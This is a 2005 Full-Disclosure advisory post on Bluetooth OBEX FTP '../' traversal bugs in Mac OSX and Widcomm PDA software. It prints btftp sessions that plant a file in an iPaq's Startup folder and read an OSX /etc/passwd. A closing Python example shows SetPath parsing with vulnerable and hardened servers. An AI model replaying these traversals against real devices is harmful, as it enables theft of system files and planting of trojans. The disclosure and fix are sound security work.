[Full-disclosure] Bluetooth dot dot attacks (update)

From: KF (lists) (kf_lists_at_digitalmunition.com)
Date: 06/15/05

    Date: Wed, 15 Jun 2005 02:24:33 -0400
    To: full-disclosure@lists.grok.org.uk

    Somehow this did not make it to the list today. I think I sent it to the
    OLD list address... whoops!

    In DMA[2005-0502a] I stated that "...I cannot confirm nor deny that files can be placed or retrieved via OBEX FTP and
    the ../../ method. I have only been able to list files using my current obex client (against Mac OSX)."

    With a modified version of btftp from Affix-3.2.0 I am now able to confirm that an attacker also has the ability to both
    grab and put files outside of the default drop path when using OBEX ftp.

    Zero authentication is required on OSX if an unpatched machine is being used.

    I can also now state that Widcomm software on PDAs is also affected. This is NOT the same as my object push ../
    vulnerability. This Widcomm bug is yet another bug that has not been disclosed in the past. Some PDAs require
    authentication for OBEX FTP ... some do not.

    Here is an example attack against my HP iPaq 2215:

    animosity:/usr/src/affix-3.2.0# btftp
    Affix version: Affix 3.2.0
    Welcome to btftp (OBEX) tool. Type ? for help.
    Mode: Bluetooth
    ftp> open 00:04:3e:65:a1:c8
    Service found on channel: 3
    Connected.
    ftp> ls
    -rwdx 634 eyiot447.pwi
    drwdx 0 Business
    drwdx 0 Personal
    drwdx 0 Templates
    Command complete.
    ftp> cd ../
    Command complete.
    ftp> ls
    drwdx 0 ..
    Command complete.
    ftp> cd Windows
    Command complete.
    ftp> cd Startup
    Command complete.
    ftp> put /etc/hosts trojan
    Transfer started...
    Transfer complete.
    257 bytes sent in 0.5 secs (5140.00 B/s)
    ftp> ls trojan
    Browsing error: OBEX error: Internal server error (0x50)
    ftp>

    If I go to the iPaq and browse the folder in question the file is sitting right where I placed it.

    Here is an example attack against my Apple OSX machine; this shows me grabbing /etc/passwd:

    animosity:/usr/src/affix-3.2.0# btftp
    Affix version: Affix 3.2.0
    Welcome to btftp (OBEX) tool. Type ? for help.
    Mode: Bluetooth
    ftp> open 00:11:95:4f:60:1f
    Service found on channel: 15
    Connected.
    ftp> ls
    d---- 0 Faxes
    d---- 0 New Folder
    d---- 0 SC Info
    Command complete.
    ftp> cd ../
    Command complete.
    ftp> ls
    d---- 0 ..
    ----- 195662 4D WebSTAR Installer.log
    d---- 0 johnh
    d---- 0 kevinfinisterre
    d---- 0 Shared
    d---- 0 webstar
    Command complete.
    ftp> cd ../
    Command complete.
    ftp> ls
    d---- 0 ..
    d---- 0 Applications
    d---- 0 automount
    d---- 0 bin
    d---- 0 cores
    ----- 3584 Desktop DB
    ----- 4482 Desktop DF
    d---- 0 dev
    d---- 0 Developer
    ----- 11 etc
    d---- 0 File Transfer Folder
    d---- 0 Library
    ----- 9 mach
    ----- 571184 mach.sym
    ----- 3872560 mach_kernel
    d---- 0 Network
    d---- 0 private
    d---- 0 sbin
    d---- 0 System
    ----- 11 tmp
    d---- 0 Users
    d---- 0 usr
    ----- 11 var
    d---- 0 Volumes
    Command complete.
    ftp> cd etc
    Command complete.
    ftp> ls
    d---- 0 ..
    ----- 753 6to4.conf
    ----- 515 afpovertcp.cfg
    ----- 15 aliases
    ----- 16384 aliases.db
    ----- 1046 amd.conf.template
    ----- 112 amd.map.template
    d---- 0 auth
    ----- 14761 authorization
    ----- 16541 authorization.cac
    ----- 160 bashrc
    d---- 0 charset
    ----- 295 crontab
    ----- 189 csh.cshrc
    ----- 83 csh.login
    ----- 39 csh.logout
    d---- 0 cups
    ----- 24 daily
    d---- 0 defaults
    ----- 0 dumpdates
    ----- 695 efax.rc
    ----- 0 find.codes
    d---- 0 fonts
    ----- 293 fstab
    ----- 150 fstab.hd
    ----- 119 ftpusers
    ----- 576 gdb.conf
    ----- 5678 gettytab
    ----- 699 group
    ----- 491 hostconfig
    ----- 492 hostconfig~
    ----- 0 hosts.equiv
    ----- 0 hosts.lpd
    d---- 0 httpd
    d---- 0 idmap
    ----- 2893 inetd.conf
    ----- 12 kcpassword
    ----- 0 kern_loader.conf
    ----- 30 localtime
    ----- 131072 lowcase.dat
    d---- 0 mach_init.d
    d---- 0 mach_init_per_user.d
    ----- 105 mail.rc
    ----- 891 manpath.config
    ----- 1259 master.passwd
    ----- 88039 moduli
    ----- 28 monthly
    ----- 19 motd
    ----- 905 named.conf
    ----- 53 networks
    ----- 132 notify.conf
    ----- 44 ntp.conf
    d---- 0 openldap
    d---- 0 pam.d
    ----- 1374 passwd
    d---- 0 pdb
    d---- 0 periodic
    ----- 38693 php.ini.default
    d---- 0 postfix
    d---- 0 ppp
    ----- 125 profile
    ----- 5766 protocols
    d---- 0 racoon
    ----- 8099 rc
    ----- 3572 rc.boot
    ----- 4178 rc.cleanup
    ----- 2356 rc.common
    ----- 4763 rc.netboot
    ----- 20 resolv.conf
    d---- 0 resolver
    ----- 13 rmt
    ----- 0 rmtab
    ----- 971 rpc
    ----- 983 rtadvd.conf
    ----- 572576 services
    ----- 170 shells
    ----- 52 slpsa.conf
    ----- 1732 smb.conf
    ----- 1144 ssh_config
    ----- 668 ssh_host_dsa_key
    ----- 590 ssh_host_dsa_key.pub
    ----- 515 ssh_host_key
    ----- 319 ssh_host_key.pub
    ----- 883 ssh_host_rsa_key
    ----- 210 ssh_host_rsa_key.pub
    ----- 2409 sshd_config
    ----- 361 sudoers
    ----- 798 syslog.conf
    ----- 2442 ttys
    ----- 131072 upcase.dat
    ----- 65536 valid.dat
    d---- 0 vfs
    ----- 26 weekly
    ----- 238 xinetd.conf
    d---- 0 xinetd.d
    ----- 0 xtab
    Command complete.
    ftp> get passwd
    Transfer started...
    Transfer complete.
    268564544 bytes received in 0.34 secs (789895717.65 B/s)

    animosity:/usr/local/bin# cat passwd
    ##
    # User Database
    #
    # Note that this file is consulted when the system is running in single-user
    # mode. At other times this information is handled by one or more of:
    # lookupd DirectoryServices
    # By default, lookupd gets information from NetInfo, so this file will
    # not be consulted unless you have changed lookupd's configuration.
    # This file is used while in single user mode.
    #
    # To use this file for normal authentication, you may enable it with
    # /Applications/Utilities/Directory Access.
    ##
    nobody:*:-2:-2:Unprivileged User:/:/usr/bin/false
    root:*:0:0:System Administrator:/var/root:/bin/sh
    daemon:*:1:1:System Services:/var/root:/usr/bin/false
    smmsp:*:25:25:Sendmail User:/private/etc/mail:/usr/bin/false
    lp:*:26:26:Printing Services:/var/spool/cups:/usr/bin/false
    postfix:*:27:27:Postfix User:/var/spool/postfix:/usr/bin/false
    www:*:70:70:World Wide Web Server:/Library/WebServer:/usr/bin/false
    eppc:*:71:71:Apple Events User:/var/empty:/usr/bin/false
    mysql:*:74:74:MySQL Server:/var/empty:/usr/bin/false
    sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false
    qtss:*:76:76:QuickTime Streaming Server:/var/empty:/usr/bin/false
    cyrus:*:77:6:Cyrus User:/var/imap:/usr/bin/false
    mailman:*:78:78:Mailman user:/var/empty:/usr/bin/false
    appserver:*:79:79:Application Server:/var/empty:/usr/bin/false
    unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false

    This shows me placing a file in /tmp:

    Affix version: Affix 2.1.1
    Wellcome to OBEX ftp. Type ? for help.
    Mode: Bluetooth
    SDP: yes
    ftp> open 00:11:95:4f:60:1f
    Connected.
    ftp> ls
    d---- 0 Faxes
    d---- 0 New Folder
    d---- 0 SC Info
    Command complete.
    ftp> cd ../
    Command complete.
    ftp> cd ../
    Command complete.
    ftp> cd tmp
    Command complete.
    ftp> ls
    d---- 0 ..
    Command complete.
    ftp> put /etc/hosts hosts
    Transfer started...
    Transfer complete.
    257 bytes sent in 0.10 secs (2570.00 B/s)
    ftp> ls
    d---- 0 ..
    d---- 0 501
    ----- 257 hosts
    Command complete.

    Keep in mind that you are using the permissions of the currently logged-in user, so you may not have access to
    everything.

    It seems pretty trivial to turn these issues into a worm or some other form of automated attack.

    Please apply your Apple updates and turn off that Widcomm stuff if you aren't using it! Do NOT accept requests
    from unknown Bluetooth sources.

    enjoy.
    -KF

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.grok.org.uk/full-disclosure-charter.html
    Hosted and sponsored by Secunia - http://secunia.com/
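Added example, not part of KF's post and not code from Affix, Widcomm or Apple: the "cd ../" lines in the btftp
sessions above are OBEX SetPath requests, and the bug is that the affected servers joined the Name header straight
onto the current directory. The block below encodes and parses SetPath the way the OBEX spec lays it out (opcode
0x85, flags byte, Name header 0x01 carrying a NUL-terminated UTF-16BE string), then replays the post's
"cd ../", "cd ../", "cd etc" sequence against two toy server implementations: one that resolves paths the way the
vulnerable servers evidently did, and one that refuses separators and dot entries in Name and checks that the
resolved directory is still under the share root. The server class, the directory tree and the sample file are
this example's own assumptions, built in a temporary directory so it runs offline.

```python
"""Added example (not from the original post): OBEX FTP SetPath handling,
vulnerable and hardened. Packet layout follows the OBEX spec; the server
logic, directory layout and file names are assumptions of this example."""
import os
import struct
import tempfile

OBEX_SETPATH = 0x85   # SetPath opcode with the final bit set
HDR_NAME = 0x01       # Name header: 2-byte length, then UTF-16BE text, NUL-terminated
FLAG_BACKUP = 0x01    # SetPath flags bit 0: move to the parent before applying Name
RSP_OK, RSP_FORBIDDEN, RSP_NOT_FOUND = 0xA0, 0xC3, 0xC4   # response codes, final bit set


def build_setpath(name=None, backup=False):
    """Encode a SetPath request. A client such as btftp sends 'cd ../' as a
    literal Name of "../"; a spec-conforming 'cd ..' sets the backup flag
    and omits Name. An empty Name means "go to the root of the share"."""
    body = bytes([FLAG_BACKUP if backup else 0, 0])        # flags, constants
    if name is not None:
        text = name.encode("utf-16-be") + b"\x00\x00" if name else b""
        body += bytes([HDR_NAME]) + struct.pack(">H", 3 + len(text)) + text
    return bytes([OBEX_SETPATH]) + struct.pack(">H", 3 + len(body)) + body


def parse_setpath(pkt):
    """Return (flags, name) from a SetPath request; name is None if absent."""
    if pkt[0] != OBEX_SETPATH or struct.unpack(">H", pkt[1:3])[0] != len(pkt):
        raise ValueError("malformed SetPath request")
    flags, name, pos = pkt[3], None, 5
    while pos < len(pkt):
        hi = pkt[pos]
        kind = hi & 0xC0
        if kind in (0x00, 0x40):      # text / byte-sequence headers carry a 2-byte length
            hlen = struct.unpack(">H", pkt[pos + 1:pos + 3])[0]
            if hi == HDR_NAME:
                name = pkt[pos + 3:pos + hlen].decode("utf-16-be").rstrip("\x00")
            pos += hlen
        else:                         # 1-byte (0x80) or 4-byte (0xC0) quantity headers
            pos += 2 if kind == 0x80 else 5
    return flags, name


class ObexFtpServer:
    """Toy SetPath handler (assumption of this example). sanitize=False
    reproduces the traversal shown in the post; sanitize=True confines
    the session to its root directory."""

    def __init__(self, root, sanitize):
        self.root = os.path.realpath(root)
        self.cwd = self.root
        self.sanitize = sanitize

    def setpath(self, pkt):
        flags, name = parse_setpath(pkt)
        if flags & FLAG_BACKUP:
            target = os.path.dirname(self.cwd)
        elif name == "":
            target = self.root                              # empty Name: back to root
        else:
            target = self.cwd
        if name:
            # Hardened: Name is one folder name, never a path. Refuse separators
            # and the dot entries before the filesystem ever sees them.
            if self.sanitize and (name in (".", "..") or "/" in name or "\\" in name):
                return RSP_FORBIDDEN
            target = os.path.join(target, name)             # the vulnerable join
        target = os.path.realpath(target)
        # Hardened: whatever the request encoded, the result must stay under root.
        if self.sanitize and os.path.commonpath([target, self.root]) != self.root:
            return RSP_FORBIDDEN
        if not os.path.isdir(target):
            return RSP_NOT_FOUND
        self.cwd = target
        return RSP_OK


def demo():
    """Replay 'cd ../', 'cd ../', 'cd etc' against both servers on a constructed
    tree (base/home/Public is the share, base/etc/passwd the target). Returns
    the response codes and where each server's cwd ended up, relative to base."""
    base = os.path.realpath(tempfile.mkdtemp())
    root = os.path.join(base, "home", "Public")
    os.makedirs(os.path.join(root, "Business"))
    os.makedirs(os.path.join(base, "etc"))
    with open(os.path.join(base, "etc", "passwd"), "w") as fh:
        fh.write("root:*:0:0:System Administrator:/var/root:/bin/sh\n")   # constructed sample
    session = [build_setpath("../"), build_setpath("../"), build_setpath("etc")]
    results = {}
    for label, sanitize in (("vulnerable", False), ("hardened", True)):
        srv = ObexFtpServer(root, sanitize)
        codes = [srv.setpath(pkt) for pkt in session]
        results[label] = (codes, os.path.relpath(srv.cwd, base).replace(os.sep, "/"))
    # A spec-conforming backup (flag set, no Name) from inside the share is still allowed.
    srv = ObexFtpServer(root, True)
    srv.setpath(build_setpath("Business"))
    code = srv.setpath(build_setpath(backup=True))
    results["hardened_backup"] = (code, os.path.relpath(srv.cwd, base).replace(os.sep, "/"))
    return results


if __name__ == "__main__":
    print(demo())
```

The vulnerable server answers 0xA0 (OK) to all three requests and ends in base/etc, exactly the walk shown in the
OSX session; the hardened one answers 0xC3 (Forbidden) to both "../" names without touching the filesystem, and
0xC4 (Not Found) to "cd etc" because there is no etc folder under the share. Both checks are needed: the Name
filter stops literal "../" (and the backslash form a Windows-based stack might accept), and the realpath
containment check stops the backup flag from walking above the root.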

